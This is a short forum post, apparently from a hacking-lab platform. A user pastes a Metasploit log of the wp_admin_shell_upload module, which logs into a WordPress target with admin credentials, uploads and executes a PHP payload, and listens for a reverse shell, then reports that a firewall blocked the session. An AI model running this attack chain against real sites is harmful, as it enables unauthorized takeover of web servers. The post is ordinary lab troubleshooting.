Type your comment> @R4ZZB33RY said:
Hey all,
After I set all my options, which i've tripple checked i get the following
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
[] Started reverse TCP handler on 10.10.14.18:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php…
[!] This exploit may require manual cleanup of ‘CXffIyrlNi.php’ on the target
[!] This exploit may require manual cleanup of ‘isEHXJHygE.php’ on the target
[!] This exploit may require manual cleanup of ‘…/isEHXJHygE’ on the target
[] Exploit completed, but no session was created.am I doing something wrong? Please help
I figured it out folks! It was my firewall.